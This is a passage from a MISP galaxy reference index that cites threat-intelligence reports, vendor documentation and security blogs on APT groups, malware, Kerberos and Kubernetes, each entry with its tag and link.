https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html

Check Point APT34 April 2021

Check Point. (2021, April 8). Iran’s APT34 Returns with an Updated Arsenal. Retrieved May 5, 2021.

The tag is: misp-galaxy:references="Check Point APT34 April 2021"

Table 14094. Table References

Links

https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/

Dark Reading APT39 JAN 2019

Higgins, K. (2019, January 30). Iran Ups its Traditional Cyber Espionage Tradecraft. Retrieved May 22, 2020.

The tag is: misp-galaxy:references="Dark Reading APT39 JAN 2019"

Table 14095. Table References

Links

https://www.darkreading.com/attacks-breaches/iran-ups-its-traditional-cyber-espionage-tradecraft/d/d-id/1333764

U.S. CISA IRGC-Affiliated PLC Activity December 2023

Cybersecurity and Infrastructure Security Agency. (2023, December 1). IRGC-Affiliated Cyber Actors Exploit PLCs in Multiple Sectors, Including U.S. Water and Wastewater Systems Facilities. Retrieved December 5, 2023.

The tag is: misp-galaxy:references="U.S. CISA IRGC-Affiliated PLC Activity December 2023"

Table 14096. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-335a

Secureworks IRON HEMLOCK Profile

Secureworks CTU. (n.d.). IRON HEMLOCK. Retrieved February 22, 2022.

The tag is: misp-galaxy:references="Secureworks IRON HEMLOCK Profile"

Table 14097. Table References

Links

http://www.secureworks.com/research/threat-profiles/iron-hemlock

Secureworks IRON HUNTER Profile

Secureworks CTU. (n.d.). IRON HUNTER. Retrieved February 22, 2022.

The tag is: misp-galaxy:references="Secureworks IRON HUNTER Profile"

Table 14098. Table References

Links

http://www.secureworks.com/research/threat-profiles/iron-hunter

Secureworks IRON LIBERTY

Secureworks. (n.d.). IRON LIBERTY. Retrieved October 15, 2020.

The tag is: misp-galaxy:references="Secureworks IRON LIBERTY"

Table 14099. Table References

Links

https://www.secureworks.com/research/threat-profiles/iron-liberty

Unit 42 IronNetInjector February 2021

Reichel, D. (2021, February 19). IronNetInjector: Turla’s New Malware Loading Tool. Retrieved February 24, 2021.

The tag is: misp-galaxy:references="Unit 42 IronNetInjector February 2021"

Table 14100. Table References

Links

https://unit42.paloaltonetworks.com/ironnetinjector/

Secureworks IRON RITUAL Profile

Secureworks CTU. (n.d.). IRON RITUAL. Retrieved February 24, 2022.

The tag is: misp-galaxy:references="Secureworks IRON RITUAL Profile"

Table 14101. Table References

Links

https://www.secureworks.com/research/threat-profiles/iron-ritual

Trend Micro Iron Tiger April 2021

Lunghi, D. and Lu, K. (2021, April 9). Iron Tiger APT Updates Toolkit With Evolved SysUpdate Malware. Retrieved November 12, 2021.

The tag is: misp-galaxy:references="Trend Micro Iron Tiger April 2021"

Table 14102. Table References

Links

https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html

Lunghi Iron Tiger Linux

Daniel Lunghi. (2023, March 1). Iron Tiger’s SysUpdate Reappears, Adds Linux Targeting. Retrieved March 20, 2023.

The tag is: misp-galaxy:references="Lunghi Iron Tiger Linux"

Table 14103. Table References

Links

https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html

Secureworks IRON TILDEN Profile

Secureworks CTU. (n.d.). IRON TILDEN. Retrieved February 24, 2022.

The tag is: misp-galaxy:references="Secureworks IRON TILDEN Profile"

Table 14104. Table References

Links

https://www.secureworks.com/research/threat-profiles/iron-tilden

Secureworks IRON TWILIGHT Profile

Secureworks CTU. (n.d.). IRON TWILIGHT. Retrieved February 28, 2022.

The tag is: misp-galaxy:references="Secureworks IRON TWILIGHT Profile"

Table 14105. Table References

Links

https://www.secureworks.com/research/threat-profiles/iron-twilight

Secureworks IRON TWILIGHT Active Measures March 2017

Secureworks CTU. (2017, March 30). IRON TWILIGHT Supports Active Measures. Retrieved February 28, 2022.

The tag is: misp-galaxy:references="Secureworks IRON TWILIGHT Active Measures March 2017"

Table 14106. Table References

Links

https://www.secureworks.com/research/iron-twilight-supports-active-measures

Secureworks IRON VIKING

Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020.

The tag is: misp-galaxy:references="Secureworks IRON VIKING"

Table 14107. Table References

Links

https://www.secureworks.com/research/threat-profiles/iron-viking

ESET Hermetic Wizard March 2022

ESET. (2022, March 1). IsaacWiper and HermeticWizard: New wiper and worm targetingUkraine. Retrieved April 10, 2022.

The tag is: misp-galaxy:references="ESET Hermetic Wizard March 2022"

Table 14108. Table References

Links

https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine

Microsoft ISAPICGIRestriction 2016

Microsoft. (2016, September 26). ISAPI/CGI Restrictions <isapiCgiRestriction>. Retrieved June 3, 2021.

The tag is: misp-galaxy:references="Microsoft ISAPICGIRestriction 2016"

Table 14109. Table References

Links

https://docs.microsoft.com/en-us/iis/configuration/system.webserver/security/isapicgirestriction/

Microsoft ISAPI Extension Overview 2017

Microsoft. (2017, June 16). ISAPI Extension Overview. Retrieved June 3, 2021.

The tag is: misp-galaxy:references="Microsoft ISAPI Extension Overview 2017"

Table 14110. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms525172(v=vs.90)

Microsoft ISAPI Filter Overview 2017

Microsoft. (2017, June 16). ISAPI Filter Overview. Retrieved June 3, 2021.

The tag is: misp-galaxy:references="Microsoft ISAPI Filter Overview 2017"

Table 14111. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms524610(v=vs.90)

iSight Sandworm Oct 2014

Ward, S.. (2014, October 14). iSIGHT discovers zero-day vulnerability CVE-2014-4114 used in Russian cyber-espionage campaign. Retrieved June 10, 2020.

The tag is: misp-galaxy:references="iSight Sandworm Oct 2014"

Table 14112. Table References

Links

https://web.archive.org/web/20160503234007/https://www.isightpartners.com/2014/10/cve-2014-4114/

CrySyS Blog TeamSpy

CrySyS Lab. (2013, March 20). TeamSpy – Obshie manevri. Ispolzovat’ tolko s razreshenija S-a. Retrieved April 11, 2018.

The tag is: misp-galaxy:references="CrySyS Blog TeamSpy"

Table 14113. Table References

Links

https://blog.crysys.hu/2013/03/teamspy/

NYTStuxnet

William J. Broad, John Markoff, and David E. Sanger. (2011, January 15). Israeli Test on Worm Called Crucial in Iran Nuclear Delay. Retrieved March 1, 2017.

The tag is: misp-galaxy:references="NYTStuxnet"

Table 14114. Table References

Links

https://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html

Microsoft Issues with BITS July 2011

Microsoft. (2011, July 19). Issues with BITS. Retrieved January 12, 2018.

The tag is: misp-galaxy:references="Microsoft Issues with BITS July 2011"

Table 14115. Table References

Links

https://technet.microsoft.com/library/dd939934.aspx

Ready.gov IT DRP

Ready.gov. (n.d.). IT Disaster Recovery Plan. Retrieved March 15, 2019.

The tag is: misp-galaxy:references="Ready.gov IT DRP"

Table 14116. Table References

Links

https://www.ready.gov/business/implementation/IT

Security Intelligence ITG08 April 2020

Villadsen, O. (2020, April 7). ITG08 (aka FIN6) Partners With TrickBot Gang, Uses Anchor Framework. Retrieved October 8, 2020.

The tag is: misp-galaxy:references="Security Intelligence ITG08 April 2020"

Table 14117. Table References

Links

https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/

Talos Frankenstein June 2019

Adamitis, D. et al. (2019, June 4). It’s alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020.

The tag is: misp-galaxy:references="Talos Frankenstein June 2019"

Table 14118. Table References

Links

https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html

AdSecurity Forging Trust Tickets

Metcalf, S. (2015, July 15). It’s All About Trust – Forging Kerberos Trust Tickets to Spoof Access across Active Directory Trusts. Retrieved February 14, 2019.

The tag is: misp-galaxy:references="AdSecurity Forging Trust Tickets"

Table 14119. Table References

Links

https://adsecurity.org/?p=1588

It’s Always DarkGate Before the Dawn

Micah Babinski. (2020, October 16). It’s Always DarkGate Before the Dawn. Retrieved October 20, 2023.

The tag is: misp-galaxy:references="It’s Always DarkGate Before the Dawn"

Table 14120. Table References

Links

https://micahbabinski.medium.com/its-always-darkgate-before-the-dawn-d6cf1ec56f7e

CitizenLab KeyBoy Nov 2016

Hulcoop, A., et al. (2016, November 17). It’s Parliamentary KeyBoy and the targeting of the Tibetan Community. Retrieved June 13, 2019.

The tag is: misp-galaxy:references="CitizenLab KeyBoy Nov 2016"

Table 14121. Table References

Links

https://citizenlab.ca/2016/11/parliament-keyboy/

Twitter ItsReallyNick Status Update APT32 PubPrn

Carr, N. (2017, December 22). ItsReallyNick Status Update. Retrieved April 9, 2018.

The tag is: misp-galaxy:references="Twitter ItsReallyNick Status Update APT32 PubPrn"

Table 14122. Table References

Links

https://twitter.com/ItsReallyNick/status/944321013084573697

Trend Micro IXESHE 2012

Sancho, D., et al. (2012, May 22). IXESHE An APT Campaign. Retrieved June 7, 2019.

The tag is: misp-galaxy:references="Trend Micro IXESHE 2012"

Table 14123. Table References

Links

https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_ixeshe.pdf

James TermServ DLL

James. (2019, July 14). @James_inthe_box. Retrieved March 28, 2022.

The tag is: misp-galaxy:references="James TermServ DLL"

Table 14124. Table References

Links

https://twitter.com/james_inthe_box/status/1150495335812177920

Symantec Cicada November 2020

Symantec. (2020, November 17). Japan-Linked Organizations Targeted in Long-Running and Sophisticated Attack Campaign. Retrieved December 17, 2020.

The tag is: misp-galaxy:references="Symantec Cicada November 2020"

Table 14125. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage

Carbon Black JCry May 2019

Lee, S.. (2019, May 14). JCry Ransomware. Retrieved June 18, 2019.

The tag is: misp-galaxy:references="Carbon Black JCry May 2019"

Table 14126. Table References

Links

https://www.carbonblack.com/2019/05/14/cb-tau-threat-intelligence-notification-jcry-ransomware-pretends-to-be-adobe-flash-player-update-installer/

ClearSky CopyKittens March 2017

ClearSky Cyber Security. (2017, March 30). Jerusalem Post and other Israeli websites compromised by Iranian threat agent CopyKitten. Retrieved August 21, 2017.

The tag is: misp-galaxy:references="ClearSky CopyKittens March 2017"

Table 14127. Table References

Links

http://www.clearskysec.com/copykitten-jpost/

Joe Sandbox 23893f035f8564dfea5030b9fdd54120d96072bb

Joe Sandbox. (n.d.). Joe Sandbox 23893f035f8564dfea5030b9fdd54120d96072bb. Retrieved October 20, 2023.

The tag is: misp-galaxy:references="Joe Sandbox 23893f035f8564dfea5030b9fdd54120d96072bb"

Table 14128. Table References

Links

https://www.joesandbox.com/analysis/1280109/0/html

Joe Slowik August 2019

Joe Slowik. (2019, August 15) CRASHOVERRIDE: Reassessing the 2016 Ukraine Electric Power Event as a Protection-Focused Attack. Retrieved October 22, 2019

The tag is: misp-galaxy:references="Joe Slowik August 2019"

Table 14129. Table References

Links

https://dragos.com/wp-content/uploads/CRASHOVERRIDE.pdf

US District Court of DC Phosphorus Complaint 2019

US District Court of DC. (2019, March 14). MICROSOFT CORPORATION v. JOHN DOES 1-2, CONTROLLING A COMPUTER NETWORK AND THEREBY INJURING PLAINTIFF AND ITS CUSTOMERS. Retrieved March 8, 2021.

The tag is: misp-galaxy:references="US District Court of DC Phosphorus Complaint 2019"

Table 14130. Table References

Links

https://noticeofpleadings.com/phosphorus/files/Complaint.pdf

NCSC Joint Report Public Tools

The Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NZ NCSC), CERT New Zealand, the UK National Cyber Security Centre (UK NCSC) and the US National Cybersecurity and Communications Integration Center (NCCIC). (2018, October 11). Joint report on publicly available hacking tools. Retrieved March 11, 2019.

The tag is: misp-galaxy:references="NCSC Joint Report Public Tools"

Table 14131. Table References

Links

https://www.ncsc.gov.uk/report/joint-report-on-publicly-available-hacking-tools

USG Joint Statement SolarWinds January 2021

FBI, CISA, ODNI, NSA. (2022, January 5). Joint Statement by the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Office of the Director of National Intelligence (ODNI), and the National Security Agency (NSA). Retrieved March 26, 2023.

The tag is: misp-galaxy:references="USG Joint Statement SolarWinds January 2021"

Table 14132. Table References

Links

https://www.cisa.gov/news-events/news/joint-statement-federal-bureau-investigation-fbi-cybersecurity-and-infrastructure

Jsc.exe - LOLBAS Project

LOLBAS. (2019, May 31). Jsc.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Jsc.exe - LOLBAS Project"

Table 14133. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Jsc/

Juniper Netscreen of the Dead

Graeme Neilson . (2009, August). Juniper Netscreen of the Dead. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="Juniper Netscreen of the Dead"

Table 14134. Table References

Links

https://www.blackhat.com/presentations/bh-usa-09/NEILSON/BHUSA09-Neilson-NetscreenDead-SLIDES.pdf

Microsoft PS JEA

Microsoft. (2022, November 17). Just Enough Administration. Retrieved March 27, 2023.

The tag is: misp-galaxy:references="Microsoft PS JEA"

Table 14135. Table References

Links

https://learn.microsoft.com/powershell/scripting/learn/remoting/jea/overview?view=powershell-7.3

U.S. Justice Department GRU Botnet February 2024

Office of Public Affairs. (2024, February 15). Justice Department Conducts Court-Authorized Disruption of Botnet Controlled by the Russian Federation’s Main Intelligence Directorate of the General Staff (GRU). Retrieved February 29, 2024.

The tag is: misp-galaxy:references="U.S. Justice Department GRU Botnet February 2024"

Table 14136. Table References

Links

https://www.justice.gov/opa/pr/justice-department-conducts-court-authorized-disruption-botnet-controlled-russian

Azure Active Directory Reconnaisance

Dr. Nestori Syynimaa. (2020, June 13). Just looking: Azure Active Directory reconnaissance as an outsider. Retrieved May 27, 2022.

The tag is: misp-galaxy:references="Azure Active Directory Reconnaisance"

Table 14137. Table References

Links

https://o365blog.com/post/just-looking/

Azure AD Recon

Dr. Nestori Syynimaa. (2020, June 13). Just looking: Azure Active Directory reconnaissance as an outsider. Retrieved February 1, 2022.

The tag is: misp-galaxy:references="Azure AD Recon"

Table 14138. Table References

Links

https://o365blog.com/post/just-looking

intezer-kaiji-malware

Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware turning to Golang. Retrieved December 17, 2020.

The tag is: misp-galaxy:references="intezer-kaiji-malware"

Table 14139. Table References

Links

https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/

Kali Redsnarf

NCC Group PLC. (2016, November 1). Kali Redsnarf. Retrieved December 11, 2017.

The tag is: misp-galaxy:references="Kali Redsnarf"

Table 14140. Table References

Links

https://github.com/nccgroup/redsnarf

TrustedSignal Service Failure

Hull, D. (2014, May 3). Kansa: Service related collectors and analysis. Retrieved October 10, 2019.

The tag is: misp-galaxy:references="TrustedSignal Service Failure"

Table 14141. Table References

Links

https://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.html

Hull, D.. (2014, May 3). Kansa: Service related collectors and analysis. Retrieved October 10, 2019.

The tag is: misp-galaxy:references="Kansa Service related collectors"

Table 14142. Table References

Links

https://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.html

CISA Karakurt 2022

Cybersecurity Infrastructure and Defense Agency. (2022, June 2). Karakurt Data Extortion Group. Retrieved March 10, 2023.

The tag is: misp-galaxy:references="CISA Karakurt 2022"

Table 14143. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-152a

Kaspersky Lab SynAck May 2018

Bettencourt, J. (2018, May 7). Kaspersky Lab finds new variant of SynAck ransomware using sophisticated Doppelgänging technique. Retrieved May 24, 2018.

The tag is: misp-galaxy:references="Kaspersky Lab SynAck May 2018"

Table 14144. Table References

Links

https://usa.kaspersky.com/about/press-releases/2018_synack-doppelganging

Unit 42 Kazuar May 2017

Levene, B, et al. (2017, May 03). Kazuar: Multiplatform Espionage Backdoor with API Access. Retrieved July 17, 2018.

The tag is: misp-galaxy:references="Unit 42 Kazuar May 2017"

Table 14145. Table References

Links

https://researchcenter.paloaltonetworks.com/2017/05/unit42-kazuar-multiplatform-espionage-backdoor-api-access/

Citizen Lab Stealth Falcon May 2016

Marczak, B. and Scott-Railton, J.. (2016, May 29). Keep Calm and (Don’t) Enable Macros: A New Threat Actor Targets UAE Dissidents. Retrieved June 8, 2016.

The tag is: misp-galaxy:references="Citizen Lab Stealth Falcon May 2016"

Table 14146. Table References

Links

https://citizenlab.org/2016/05/stealth-falcon/

Github KeeThief

Lee, C., Schoreder, W. (n.d.). KeeThief. Retrieved February 8, 2021.

The tag is: misp-galaxy:references="Github KeeThief"

Table 14147. Table References

Links

https://github.com/GhostPack/KeeThief

Kekeo

Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.

The tag is: misp-galaxy:references="Kekeo"

Table 14148. Table References

Links

https://github.com/gentilkiwi/kekeo

Harmj0y Kerberoast Nov 2016

Schroeder, W. (2016, November 1). Kerberoasting Without Mimikatz. Retrieved March 23, 2018.

The tag is: misp-galaxy:references="Harmj0y Kerberoast Nov 2016"

Table 14149. Table References

Links

https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/

ADSecurity Kerberos Ring Decoder

Sean Metcalf. (2014, September 12). Kerberos, Active Directory’s Secret Decoder Ring. Retrieved February 27, 2020.

The tag is: misp-galaxy:references="ADSecurity Kerberos Ring Decoder"

Table 14150. Table References

Links

https://adsecurity.org/?p=227

macOS kerberos framework MIT

Massachusetts Institute of Technology. (2007, October 27). Kerberos for Macintosh Preferences Documentation. Retrieved October 6, 2021.

The tag is: misp-galaxy:references="macOS kerberos framework MIT"

Table 14151. Table References

Links

http://web.mit.edu/macdev/KfM/Common/Documentation/preferences.html

Microsoft Kerberos Golden Ticket

Microsoft. (2015, March 24). Kerberos Golden Ticket Check (Updated). Retrieved February 27, 2020.

The tag is: misp-galaxy:references="Microsoft Kerberos Golden Ticket"

Table 14152. Table References

Links

https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285

CERT-EU Golden Ticket Protection

Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016, April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.

The tag is: misp-galaxy:references="CERT-EU Golden Ticket Protection"

Table 14153. Table References

Links

https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf

AdSecurity Kerberos GT Aug 2015

Metcalf, S. (2015, August 7). Kerberos Golden Tickets are Now More Golden. Retrieved December 1, 2017.

The tag is: misp-galaxy:references="AdSecurity Kerberos GT Aug 2015"

Table 14154. Table References

Links

https://adsecurity.org/?p=1640

ADSecurity Kerberos and KRBTGT

Sean Metcalf. (2014, November 10). Kerberos & KRBTGT: Active Directory’s Domain Kerberos Service Account. Retrieved January 30, 2020.

The tag is: misp-galaxy:references="ADSecurity Kerberos and KRBTGT"

Table 14155. Table References

Links

https://adsecurity.org/?p=483

Microsoft Kerberos Preauth 2014

Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why It Should Not Be Disabled. Retrieved August 25, 2020.

The tag is: misp-galaxy:references="Microsoft Kerberos Preauth 2014"

Table 14156. Table References

Links

https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx

Linux Kerberos Tickets

Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red Teams. Retrieved October 4, 2021.

The tag is: misp-galaxy:references="Linux Kerberos Tickets"

Table 14157. Table References

Links

https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html

Kernel Self Protection Project

Kernel.org. (2020, February 6). Kernel Self-Protection. Retrieved June 4, 2020.

The tag is: misp-galaxy:references="Kernel Self Protection Project"

Table 14158. Table References

Links

https://www.kernel.org/doc/html/latest/security/self-protection.html

Rapid7 KeyBoy Jun 2013

Guarnieri, C., Schloesser M. (2013, June 7). KeyBoy, Targeted Attacks against Vietnam and India. Retrieved June 14, 2019.

The tag is: misp-galaxy:references="Rapid7 KeyBoy Jun 2013"

Table 14159. Table References

Links

https://blog.rapid7.com/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india/

Keychain Items Apple Dev API

Apple. (n.d.). Keychain Items. Retrieved April 12, 2022.

The tag is: misp-galaxy:references="Keychain Items Apple Dev API"

Table 14160. Table References

Links

https://developer.apple.com/documentation/security/keychain_services/keychain_items

Keychain Services Apple

Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.

The tag is: misp-galaxy:references="Keychain Services Apple"

Table 14161. Table References

Links

https://developer.apple.com/documentation/security/keychain_services

Wikipedia keychain

Wikipedia. (n.d.). Keychain (software). Retrieved July 5, 2017.

The tag is: misp-galaxy:references="Wikipedia keychain"

Table 14162. Table References

Links

https://en.wikipedia.org/wiki/Keychain_(software)

Keyctl-unmask

Mark Manning. (2020, July 23). Keyctl-unmask: "Going Florida" on The State Of Containerizing Linux Keyrings. Retrieved July 6, 2022.

The tag is: misp-galaxy:references="Keyctl-unmask"

Table 14163. Table References

Links

https://www.antitree.com/2020/07/keyctl-unmask-going-florida-on-the-state-of-containerizing-linux-keyrings/

Google Cloud Encryption Key Rotation

Google. (n.d.). Key rotation. Retrieved October 18, 2019.

The tag is: misp-galaxy:references="Google Cloud Encryption Key Rotation"

Table 14164. Table References

Links

https://cloud.google.com/kms/docs/key-rotation

KillDisk Ransomware

Catalin Cimpanu. (2016, December 29). KillDisk Disk-Wiping Malware Adds Ransomware Component. Retrieved January 12, 2021.

The tag is: misp-galaxy:references="KillDisk Ransomware"

Table 14165. Table References

Links

https://www.bleepingcomputer.com/news/security/killdisk-disk-wiping-malware-adds-ransomware-component/

Trend Micro KillDisk 1

Fernando Merces, Byron Gelera, Martin Co. (2018, June 7). KillDisk Variant Hits Latin American Finance Industry. Retrieved January 12, 2021.

The tag is: misp-galaxy:references="Trend Micro KillDisk 1"

Table 14166. Table References

Links

https://www.trendmicro.com/en_us/research/18/f/new-killdisk-variant-hits-latin-american-financial-organizations-again.html

Trend Micro KillDisk 2

Gilbert Sison, Rheniel Ramos, Jay Yaneza, Alfredo Oliveira. (2018, January 15). KillDisk Variant Hits Latin American Financial Groups. Retrieved January 12, 2021.

The tag is: misp-galaxy:references="Trend Micro KillDisk 2"

Table 14167. Table References

Links

https://www.trendmicro.com/en_us/research/18/a/new-killdisk-variant-hits-financial-organizations-in-latin-america.html

Killing IOS diversity myth

Ang Cui, Jatin Kataria, Salvatore J. Stolfo. (2011, August). Killing the myth of Cisco IOS diversity: recent advances in reliable shellcode design. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="Killing IOS diversity myth"

Table 14168. Table References

Links

https://www.usenix.org/legacy/event/woot/tech/final_files/Cui.pdf

Killing the myth of Cisco IOS rootkits

Sebastian 'topo' Muñiz. (2008, May). Killing the myth of Cisco IOS rootkits. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="Killing the myth of Cisco IOS rootkits"

Table 14169. Table References

Links

https://drwho.virtadpt.net/images/killing_the_myth_of_cisco_ios_rootkits.pdf

Vedere Labs Killnet 2022

Vedere Labs. (2022, June 2). Killnet: Analysis of Attacks from a Prominent Pro-Russian Hacktivist Group. Retrieved October 9, 2023.

The tag is: misp-galaxy:references="Vedere Labs Killnet 2022"

Table 14170. Table References

Links

https://www.forescout.com/resources/analysis-of-killnet-report/

Flashpoint Glossary Killnet

Flashpoint. (n.d.). Killnet: Inside the World’s Most Prominent Pro-Kremlin Hacktivist Collective. Retrieved October 10, 2023.

The tag is: misp-galaxy:references="Flashpoint Glossary Killnet"

Table 14171. Table References

Links

https://flashpoint.io/intelligence-101/killnet/

Malwarebytes Kimsuky June 2021

Jazi, H. (2021, June 1). Kimsuky APT continues to target South Korean government using AppleSeed backdoor. Retrieved June 10, 2021.

The tag is: misp-galaxy:references="Malwarebytes Kimsuky June 2021"

Table 14172. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/

VirusBulletin Kimsuky October 2019

Kim, J. et al. (2019, October). KIMSUKY GROUP: TRACKING THE KING OF THE SPEAR PHISHING. Retrieved November 2, 2020.

The tag is: misp-galaxy:references="VirusBulletin Kimsuky October 2019"

Table 14173. Table References

Links

https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-kimsuky-group-tracking-king-spearphishing/

EST Kimsuky April 2019

Alyac. (2019, April 3). Kimsuky Organization Steals Operation Stealth Power. Retrieved August 13, 2019.

The tag is: misp-galaxy:references="EST Kimsuky April 2019"

Table 14174. Table References

Links

https://blog.alyac.co.kr/2234

ThreatConnect Kimsuky September 2020

ThreatConnect. (2020, September 28). Kimsuky Phishing Operations Putting In Work. Retrieved October 30, 2020.

The tag is: misp-galaxy:references="ThreatConnect Kimsuky September 2020"

Table 14175. Table References

Links

https://threatconnect.com/blog/kimsuky-phishing-operations-putting-in-work/

BRI Kimsuky April 2019

BRI. (2019, April). Kimsuky unveils APT campaign 'Smoke Screen' aimed at Korea and America. Retrieved October 7, 2019.

The tag is: misp-galaxy:references="BRI Kimsuky April 2019"

Table 14176. Table References

Links

https://brica.de/alerts/alert/public/1255063/kimsuky-unveils-apt-campaign-smoke-screen-aimed-at-korea-and-america/

Microsoft Klist

Microsoft. (2021, March 3). klist. Retrieved October 14, 2021.

The tag is: misp-galaxy:references="Microsoft Klist"

Table 14177. Table References

Links

https://docs.microsoft.com/windows-server/administration/windows-commands/klist

FireEye Know Your Enemy FIN8 Aug 2016

Elovitz, S. & Ahl, I. (2016, August 18). Know Your Enemy: New Financially-Motivated & Spear-Phishing Group. Retrieved February 26, 2018.

The tag is: misp-galaxy:references="FireEye Know Your Enemy FIN8 Aug 2016"

Table 14178. Table References

Links

https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html

Github Koadic

Magius, J., et al. (2017, July 19). Koadic. Retrieved June 18, 2018.

The tag is: misp-galaxy:references="Github Koadic"

Table 14179. Table References

Links

https://github.com/zerosum0x0/koadic

ESET Kobalos Feb 2021

M.Leveille, M., Sanmillan, I. (2021, February 2). Kobalos – A complex Linux threat to high performance computing infrastructure. Retrieved August 24, 2021.

The tag is: misp-galaxy:references="ESET Kobalos Feb 2021"

Table 14180. Table References

Links

https://www.welivesecurity.com/2021/02/02/kobalos-complex-linux-threat-high-performance-computing-infrastructure/

Talos Konni May 2017

Rascagneres, P. (2017, May 03). KONNI: A Malware Under The Radar For Years. Retrieved November 5, 2018.

The tag is: misp-galaxy:references="Talos Konni May 2017"

Table 14181. Table References

Links

https://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html

Malwarebytes KONNI Evolves Jan 2022

Santos, R. (2022, January 26). KONNI evolves into stealthier RAT. Retrieved April 13, 2022.

The tag is: misp-galaxy:references="Malwarebytes KONNI Evolves Jan 2022"

Table 14182. Table References

Links

https://blog.malwarebytes.com/threat-intelligence/2022/01/konni-evolves-into-stealthier-rat/

Talos Group123

Mercer, W., Rascagneres, P. (2018, January 16). Korea In The Crosshairs. Retrieved May 21, 2018.

The tag is: misp-galaxy:references="Talos Group123"

Table 14183. Table References

Links

https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html

Kube Kubectl

kubernetes. (n.d.). kubectl. Retrieved October 13, 2021.

The tag is: misp-galaxy:references="Kube Kubectl"

Table 14184. Table References

Links

https://kubernetes.io/docs/reference/kubectl/kubectl/

Kubernetes Kubelet

The Kubernetes Authors. (n.d.). Kubelet. Retrieved March 29, 2021.

The tag is: misp-galaxy:references="Kubernetes Kubelet"

Table 14185. Table References

Links

https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/

Kubernetes CronJob

The Kubernetes Authors. (n.d.). Kubernetes CronJob. Retrieved March 29, 2021.

The tag is: misp-galaxy:references="Kubernetes CronJob"

Table 14186. Table References

Links

https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/

Kubernetes Hardening Guide

National Security Agency, Cybersecurity and Infrastructure Security Agency. (2022, March). Kubernetes Hardening Guide. Retrieved April 1, 2022.

The tag is: misp-galaxy:references="Kubernetes Hardening Guide"

Table 14187. Table References

Links

https://media.defense.gov/2022/Aug/29/2003066362/-1/-1/0/CTR_KUBERNETES_HARDENING_GUIDANCE_1.2_20220829.PDF

Kubernetes Jobs

The Kubernetes Authors. (n.d.). Kubernetes Jobs. Retrieved March 30, 2021.

The tag is: misp-galaxy:references="Kubernetes Jobs"

Table 14188. Table References

Links

https://kubernetes.io/docs/concepts/workloads/controllers/job/

Kubernetes Dashboard

The Kubernetes Authors. (n.d.). Kubernetes Web UI (Dashboard). Retrieved March 29, 2021.

The tag is: misp-galaxy:references="Kubernetes Dashboard"

Table 14189. Table References

Links

https://kubernetes.io/docs/tasks/access-application-cluster/web-ui-dashboard/

Intezer App Service Phishing

Paul Litvak. (2020, October 8). Kud I Enter Your Server? New Vulnerabilities in Microsoft Azure. Retrieved August 18, 2022.

The tag is: misp-galaxy:references="Intezer App Service Phishing"

Table 14190. Table References

Links

https://www.intezer.com/blog/malware-analysis/kud-i-enter-your-server-new-vulnerabilities-in-microsoft-azure/

Alintanahin 2014

Alintanahin, K. (2014, March 13). Kunming Attack Leads to Gh0st RAT Variant. Retrieved November 12, 2014.

The tag is: misp-galaxy:references="Alintanahin 2014"

Table 14191. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/kunming-attack-leads-to-gh0st-rat-variant/

Wits End and Shady PowerShell Profiles

DeRyke, A.. (2019, June 7). Lab Notes: Persistence and Privilege Elevation using the Powershell Profile. Retrieved July 8, 2019.

